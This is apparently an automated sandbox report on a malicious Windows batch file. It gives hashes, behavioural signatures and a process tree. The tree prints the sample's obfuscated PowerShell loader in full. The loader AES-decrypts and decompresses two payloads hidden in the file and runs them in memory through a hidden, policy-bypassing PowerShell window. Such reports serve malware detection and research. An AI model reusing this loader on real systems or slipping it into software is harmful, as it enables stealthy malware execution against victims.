Analysis
-
max time kernel
118s -
max time network
119s -
platform
windows7_x64 -
resource
win7-20231129-en -
resource tags
arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system -
submitted
24-05-2024 12:54
Static task
static1
Behavioral task
behavioral1
Sample
582241fc0a328832d3ae8c80fd1025b7ca5fc16dd89739a6131b87e77c855651.cmd
Resource
win7-20231129-en
windows7-x64
4 signatures
150 seconds
General
-
Target
582241fc0a328832d3ae8c80fd1025b7ca5fc16dd89739a6131b87e77c855651.cmd
-
Size
82KB
-
MD5
8b962a01cb7b585d3308701068180e39
-
SHA1
56528670260aa0d4b60fbffdc7566a3654112f8d
-
SHA256
582241fc0a328832d3ae8c80fd1025b7ca5fc16dd89739a6131b87e77c855651
-
SHA512
56b5012d96decb4fabef930becdc35593fbc34fcc0bfde36316a07586a2ad9d605b989db87f22ba5c0757aa78417ac7c79afee29a4cd0719aac8306a2ada56e7
-
SSDEEP
1536:orogwg5pVXbSClWeINO/7lP3zsY8rTVRIJ9KPhv74+bha95O:7SpgeIo/7lP3OWahc+bha95O
Score
8/10
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid process 2188 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 2188 powershell.exe -
Suspicious use of WriteProcessMemory 9 IoCs
Processes:
cmd.exedescription pid process target process PID 2360 wrote to memory of 1188 2360 cmd.exe cmd.exe PID 2360 wrote to memory of 1188 2360 cmd.exe cmd.exe PID 2360 wrote to memory of 1188 2360 cmd.exe cmd.exe PID 2360 wrote to memory of 2132 2360 cmd.exe cmd.exe PID 2360 wrote to memory of 2132 2360 cmd.exe cmd.exe PID 2360 wrote to memory of 2132 2360 cmd.exe cmd.exe PID 2360 wrote to memory of 2188 2360 cmd.exe powershell.exe PID 2360 wrote to memory of 2188 2360 cmd.exe powershell.exe PID 2360 wrote to memory of 2188 2360 cmd.exe powershell.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\582241fc0a328832d3ae8c80fd1025b7ca5fc16dd89739a6131b87e77c855651.cmd"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c "set __=^&rem"2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('76J7bEzHtX3VLkuJZ3oCAIh8u4PXgvIrPrnTbE0uYjM='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('PvXjXUmyPwzlCxyLb5VMvA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $WAoSC=New-Object System.IO.MemoryStream(,$param_var); $DqjpG=New-Object System.IO.MemoryStream; $gTgrK=New-Object System.IO.Compression.GZipStream($WAoSC, [IO.Compression.CompressionMode]::Decompress); $gTgrK.CopyTo($DqjpG); $gTgrK.Dispose(); $WAoSC.Dispose(); $DqjpG.Dispose(); $DqjpG.ToArray();}function execute_function($param_var,$param2_var){ $KJzOY=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $SIuiX=$KJzOY.EntryPoint; $SIuiX.Invoke($null, $param2_var);}$psbhS = 'C:\Users\Admin\AppData\Local\Temp\582241fc0a328832d3ae8c80fd1025b7ca5fc16dd89739a6131b87e77c855651.cmd';$host.UI.RawUI.WindowTitle = $psbhS;$KrZUn=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($psbhS).Split([Environment]::NewLine);foreach ($gGiAE in $KrZUn) { if ($gGiAE.StartsWith('zVnkucItcDIJmveRwHFJ')) { $FQbRn=$gGiAE.Substring(20); break; }}$payloads_var=[string[]]$FQbRn.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/2188-4-0x000007FEF5DDE000-0x000007FEF5DDF000-memory.dmpFilesize
4KB
-
memory/2188-5-0x000000001B580000-0x000000001B862000-memory.dmpFilesize
2.9MB
-
memory/2188-7-0x000007FEF5B20000-0x000007FEF64BD000-memory.dmpFilesize
9.6MB
-
memory/2188-6-0x0000000002990000-0x0000000002998000-memory.dmpFilesize
32KB
-
memory/2188-9-0x000007FEF5B20000-0x000007FEF64BD000-memory.dmpFilesize
9.6MB
-
memory/2188-8-0x000007FEF5B20000-0x000007FEF64BD000-memory.dmpFilesize
9.6MB
-
memory/2188-10-0x000007FEF5B20000-0x000007FEF64BD000-memory.dmpFilesize
9.6MB
-
memory/2188-11-0x000007FEF5B20000-0x000007FEF64BD000-memory.dmpFilesize
9.6MB
-
memory/2188-12-0x000007FEF5B20000-0x000007FEF64BD000-memory.dmpFilesize
9.6MB
-
memory/2188-13-0x000007FEF5DDE000-0x000007FEF5DDF000-memory.dmpFilesize
4KB